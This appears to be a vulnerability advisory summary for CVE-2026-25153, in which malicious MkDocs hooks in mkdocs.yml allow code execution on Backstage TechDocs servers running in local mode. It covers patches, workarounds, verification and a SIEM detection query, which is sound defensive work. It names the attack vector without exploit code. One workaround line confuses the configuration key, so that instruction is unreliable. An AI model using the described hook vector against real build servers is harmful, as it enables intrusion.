CVE-2026-25153
📋 TL;DR
This vulnerability allows attackers to execute arbitrary Python code on TechDocs build servers when configured with 'runIn: local'. Malicious actors who can modify a repository's mkdocs.yml file can exploit MkDocs hooks to achieve remote code execution. Organizations using Backstage TechDocs with local execution mode are affected.
💻 Affected Systems
- @backstage/plugin-techdocs-node
- @techdocs/cli
📦 What is this software?
Backstage by Linuxfoundation
Backstage by Linuxfoundation
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of the TechDocs build server, allowing lateral movement to other systems, data exfiltration, and persistent backdoor installation.
Likely Case
Unauthorized code execution on build servers, potentially leading to credential theft, data manipulation, or service disruption.
If Mitigated
Limited to repository-level impact with proper access controls and container isolation, reducing attack surface significantly.
🎯 Exploit Status
Exploitation requires write access to repository mkdocs.yml files. The vulnerability is well-documented in the security advisory.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: @backstage/plugin-techdocs-node 1.13.11 or 1.14.1
Vendor Advisory: https://github.com/backstage/backstage/security/advisories/GHSA-6jr7-99pf-8vgf
Restart Required: Yes
Instructions:
1. Update @backstage/plugin-techdocs-node to version 1.13.11 or 1.14.1. 2. Update @techdocs/cli to latest version. 3. Restart all TechDocs services. 4. Verify configuration uses allowlisted MkDocs keys only.
🔧 Temporary Workarounds
Switch to Docker execution
allConfigure TechDocs with 'runIn: docker' instead of 'runIn: local' to provide container isolation
Update backstage configuration to set techdocs.builder: 'local' -> techdocs.builder: 'docker'
Downgrade MkDocs version
allUse MkDocs version 1.3.1 or earlier which doesn't support hooks feature
pip install mkdocs==1.3.1
🧯 If You Can't Patch
- Implement strict access controls for mkdocs.yml files - only allow trusted contributors to modify
- Require mandatory PR reviews for all mkdocs.yml changes to detect malicious hooks configurations
🔍 How to Verify
Check if Vulnerable:
Check package.json for @backstage/plugin-techdocs-node version <1.13.11 or 1.14.x <1.14.1 AND verify TechDocs is configured with 'runIn: local'Check Version:
npm list @backstage/plugin-techdocs-nodeVerify Fix Applied:
Verify @backstage/plugin-techdocs-node version is 1.13.11 or 1.14.1+, and test that mkdocs.yml hooks configuration is now stripped with warning logs📡 Detection & Monitoring
Log Indicators:
- Warnings about unsupported MkDocs configuration keys being removed
- Unexpected Python process execution from TechDocs build context
- Unusual mkdocs.yml modifications in repository history
Network Indicators:
- Unexpected outbound connections from TechDocs build servers
- Suspicious process spawning during documentation builds
SIEM Query:
process.name: python AND parent.process.name: mkdocs OR process.name: mkdocs AND cmdline: *hooks*